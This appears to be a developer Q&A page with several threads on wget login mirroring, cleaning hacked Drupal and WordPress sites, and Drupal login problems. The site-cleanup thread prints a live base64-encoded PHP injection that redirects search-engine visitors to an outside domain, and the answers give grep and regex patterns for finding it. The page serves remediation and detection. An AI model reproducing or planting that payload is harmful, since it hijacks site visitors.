Getting past login page AND all subsequent ones - http

Before I start the question off, I want to say that a similar question helped me get past the initial login. My issue is as stated below.
There's a website that I'm trying to mirror. It is something that I have an account for. I'm using wget as my tool of choice. I tried curl, but found that while submitting post data is easy with it, wget is better equipped for the task at hand.
The website has an initial login page that it redirects to. After this, you have access to everything on the website. Logins do timeout after so long, but that's it.
With the wget commands below, I was able to successfully save my cookies, load them, and download all child folders. My issue, however, is that each child has an index.html of the same login page. It's like the cookie worked fine for the root folder but nothing beneath it.
The commands I used were:
wget http://site.here.com/users/login --save-cookies cookies.txt --post-data 'email=example#test.com&password=*****&remember_me=1' --keep-session-cookies --delete-after
wget http://site.here.com/ --load-cookies cookies.txt --keep-session-cookies -r -np
Note that the post-data variables/ids are different and that I had to download the login page to see what they were.
Secondly, note that if I didn't put remember_me value to 1 that cookies.txt would be different.
Without remember_me=1
.here.com TRUE / FALSE numbershere CAKEPHP garbagehere
With remember_me=1
site.here.com FALSE / FALSE numbershere CakeCookie[rememberme] garbage
.here.com TRUE / FALSE numbershere CAKEPHP garbagehere
The result being that the former would only download the login page and the latter getting to all child folders, only with children containing index of login and that's it.
I'm kind of stuck and my experience with wget and http is very limited. What would you do to get past this? Generate a cookie for each child? How would you automate that instead of manually creating a cookie file for each child?
P.S: I'm using Linux if that reflects the answers I'm given.

Figured it out. Kind of.
When I wget with options above, I get all children. If I then wget each child(again with options above) and make sure to specify folder by ending with "/", then it works.
Not sure why the behavior is like this, but it is. When I do this, it has no problem grabbing the children's, children or anything as such.

Related

Pattern to find malicious code starting with eval(base64_decode

I've been having issues on my server with the following PHP inserted in all of my Drupal and Wordpress sites.
I have downloaded a full backup of my sites and will clean them all before changing my ftp details and reuploading them again. Hopefully this should clear things up.
My question is:
Using Notepad++ is there a *.* style search criteria I could use to scan my backup files and delete the lines of malicious code without having to do them all individually on my local machine?
This would clearly save me loads of time. Up to now, I've been replacing the following code with blank but the eval code varies on each of my sites.
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));
I would change your FTP details immediately. You don't want them hosting warez or something if they have been able to work out the password.
Then shutdown your site so that your visitors are not subjected to any scripts or hijacks.
As far as searching goes a regex like this should sort it out:
eval\(base64_decode\("[\d\w]+"\)\);
I've also had the same problem with my WordPress blogs, eval base64_decode hack. The php files were being injected with those eval lines. I suggest you reinstall wordpress/drupal, as some other scripts may already be present in your site, then change all passwords.
Try running grep through ssh, eg. grep -r -H "eval base64_decode". It'll show you which files are infected. Then if you have time, automate the process so you will be notified in case it happens again.
And in the future, always update WordPress/Drupal.
It's easier if you can use special tools to remove this malicious code, because it could be tricky to find the actual regex to match all the code and you never know if that worked, or you broken your site. Especially when you've multiple files, you should identify the suspicious files by the following commands:
grep -R eval.*base64_decode .
grep -R return.*base64_decode .
but it could be not enough, so you should consider using these PHP security scanners.
For more details, check: How to get rid of eval-base64_decode like PHP virus files?.
For Drupal, check also: How to remove malicious scripts from admin pages after being hacked?

From where wp ecommerce is loading plugin theme files?

I updated my checkout page by updating mostly the file which was in ....wp-ecommerce/wpsc-theme/wpsc-shopping_cart_page.php
It worked fine for a while, but now some of the changed states reverted to the previous state. Actually, I can even delete the file that I mentioned above, so it means wordpress is loading this file from somewhere else. Any ideas from where and what had happened? Thanks for your help.
Although I don't have a specific answer to your question, if you use an IDE (like Dreamweaver or Eclipse) you could grab a copy of your sites code to your local PC and do a code search for something that is unique to that page.
Ie, if there is a <div class="a_unique_div"> tag somewhere on that page and you know it's only visible on that page, search the code for that and it may give you a clue what file is being used for the output. Even if it's only used on 1 or 2 pages it may bring you closer to working it out.
Alternatively, if you have SSH access you could try and "grep" for the code by SSHing into your server and running a command like:
grep -i -R '<div class="a_unique_div">' /www/your_wp_folder/
(where /www/your_wp_folder/ is the path to your WordPress installation)
Though for this you'll need SSH access, grep installed on the server, etc, so it may not be a viable option.
Good luck!

Help with potential trojan passed through site

So I'm pretty sure my site's been infected with some kind of trojan or virus that attached itself to the scripting within the site. Every time I try and update my Drupal-based site, I get a white screen with this stupid "i'mhere" message. Upon reload, the changes will take affect but I don't know what this is doing once changes are saved. This only pops up while adminstering the site, I.E. posting new content, activating/deactivating modules etc.
Problem is, I haven't the faintest idea how or where to go to remove this. The source code doesn't make reference to any malicious code. It isn't the iFrame link kind of trojan that I've seen brought up through trying to find an answer to this problem.
Things I've tried:
-Scanned computer multiple times for virus (supposedly these things attack insecure FTP data & hijack your client to upload malicious code)
-Changed FTP credentials
-Changed admin user passwords to the backend of the site (Drupal login)
-Updated Drupal
Nothing's worked so far and I'm at my wit's end trying to figure this out. Any tips in the right direction would be greatly appreciated.
Assuming the problem is really Drupal, first check to see if there's some code in a module somewhere firing during a form submit. If you have shell access and it's a Unix/Linux/etc.-based server, navigate to the Drupal directory and run:
grep -r "i\'mhere" *
This will tell you if it exists in code and what file contains it. If it's a module (likely), disable it and either see if there's an update or modify it yourself.
If it's not in code, check your database. Create a dump of your database, and run:
cat databasedump.sql | grep "i\'mhere"
Where databasedump.sql is the name of the database dump you just created. This should at least give you a general idea of what table the data exists in. Then, you can decide how you want to proceed: restore from a previous backup, delete the offending data, etc.
If it's not in either, it might be local. Check with others to see if it's occurring for them.
If it's not local, you've got something really nasty and hopefully someone else has some other ideas on what you can check. :)
Here are a list of potentially useful tools which can help you alleviate, reduce or prevent a virus infection:
bdcored chkrootkit clamd drwebd ipfw iptables kav lidsadm
logcheck logwatch ninja nod32 ossec portsentry rkhunter
sav sawmill shieldcc snort sxid sysmask tcplodg tripwire
uvscan wormscan zmbscap
It is coming straight out of an infamous backdoor malicious software, described on this stackoverflow article.
You may want to manually search for other instances of the virus by running this simple command:
[~] grep -r "base64_decode" .
as suggested in this RAT infection article on thegothicparty.com:
http://thegothicparty.com/dev/article/server-side-virus-rat/

Cannot login to drupal in Chrome or Firefox, but Safari works

Problem: Login is not working in Firefox and Chrome but it does in Safari.
Details:
We just moved a drupal 6 installation to another host and followed some steps:
Moved
sites/site1/Themes/themeFolder
to
sites/all/Themes/themeFolder
Made these changes in
page-node-NNN.tpl.php files (searched
all files in themes/themeFolder):
1) find: /oldpath/ replace: /newpath/
2) find: oldsubdomain. replace: www.
3) find: .com/sites/ replace: .com/newpath/sites/
Then as I login it fails in any browser when the wrong information is entered but when it is correct it simply redirects to that users profile page...and then nothing. There are no admin menus, no edit buttons for content and it is a though it authenticated but somehow never stored anything that would help with the authentication later.
The strange thing is that for 3 people with three different systems Firefox and Chrome don't work. But Safari does. We have ruled out that it is the database or old cookies.
Any one have a good guess?
Have you checked the $cookie_domain variable in your settings.php? It should be either commented out or adjusted to your new domain. (I faintly remember Safari having a slightly different cookie domain handling model than other browsers - not sure though.)
You could also check the cookies set by the new site in the different browsers directly and compare for differences.
Another (wild) guess would be the date/time setting on the new host. It is pretty unlikely, but if the date is off to the past, the expiration date of the cookies will be off to, and the browsers might deal differently with that.
Also, you surely have flushed all Drupal caches after the move, have you?
I could login to my client's Drupal site with Firefox but not with any other browser. It turned out my client server clock was off by 2 years. Henrik mentioned this already but I can confirm that was the cause for me.
OK< so this is an old post and while the notes here were good, they did not completely resolve my similar issue. In the end, I found that my inability to log in was due not to a corrupt sessions table, but instead due to a lack of disk space on the server. So, if all else fails, log in to your server (linux, etc.) and run df -h which will display your disk availability stats. If you find that you're very low on space, run this command:
find / -type f -size +50000k -exec ls -lh {} \; | awk '{ print $9 ": " $5 }'
(this will find all files in excess of 50MB, a good place to start if you're doing a lot of logging, etc.). Then go through and remove the files you don't need (or simply add more disk).
I had a similar problem which was caused by a corrupt sessions table in the database. I fixed it by repairing the sessions table following the advice in the article at http://www.go2linux.org/cannot-login-into-drupal-table-corrupted
Wow okay I found out one thing that will cause it to not work is setting your default windows time out of sync. If you change it to several hours ahead or behind time it could cause you to not be able to login to your website. Restore it back to the defaults and clear your cache and cookies and then close out the browser and restart it. It worked for me!

Is there any way I could get this behavior with cURL?

I am testing one of my server implementations and was wondering if I could make curl get embedded content? I mean, when a browser loads a page, it downloads all associated content too... Can someone please tell me how to do this with curl?
I don't mind if it dumps even the binary data onto the terminal... I am trying to benchmark my server (keeping it simple initially to test for bugs... probably after this, I will use one of those dedicated tools like ab)...
wget --page-requisites
This option causes Wget to download
all the files that are necessary to
properly display a given HTML page.
if you want to download recursively, use wget with -r option, instead of curl. also check out the wget man page to get certain types of files.

Resources